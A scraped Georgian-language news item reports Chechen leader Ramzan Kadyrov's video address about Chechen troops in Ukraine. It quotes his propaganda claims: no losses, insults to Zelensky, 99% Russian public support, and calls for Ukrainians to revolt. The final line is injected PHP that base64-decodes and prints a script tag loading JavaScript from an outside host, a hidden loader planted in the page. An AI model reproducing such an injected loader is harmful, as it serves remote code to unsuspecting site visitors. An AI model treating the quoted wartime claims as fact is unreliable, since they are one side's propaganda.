celsiusi
ავერსი საქკაბელი
უკრაინაში მყოფ ჩვენს სამხედროებს არც ნაკაწრი აქვთ და სურდოც კი არ დამართნიათ. ამის შესახებ ვიდეომიმართვაში ჩეჩნეთის პრეზიდენტმა რამზან კადიროვმა განაცხადა. მისი თქმით, ზოგიერთ სტრუქტურას უკრაინაში ახალი ჩეჩნური ომის გაჩაღება სურთ. 
 
"ჩვენმა მებრძოლებმა უკრაინის ნაციონალური გვარდია აიყვანეს, განაიარაღეს და გაუშვეს. ჯამბაზი ზელენსკი თქვენ გატყუებთ. ამბობს სისულელეებს. რუსი სამხედროები არ ნებდებიან. მათი მთავარი ამოცანა მშვიდობიანი მოსახლეობის დაცვაა. ბანდიტები ტექნიკას ქალაქებსა და სოფლებში აყენებენ და იქიდან ცეცხლს ხსნიან. გამყიდველები ქვეყნის წინააღმდეგ გამოდიან. პრეზიდენტის გადაწყვეტილებას კი რუსეთის მოსახლეობის 99% მხარს უჭერს. ცოდოები ხართ.  ქალები და ბავშვები დაზარალდებიან, თუ თქვენ არ გამოხვალთ და დანაშაულებრივი ხელისუფლებისგან თქვენს ქალაქებს არ გაათავისუფლებთ“, -  ამბობს კადიროვი. 
942
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");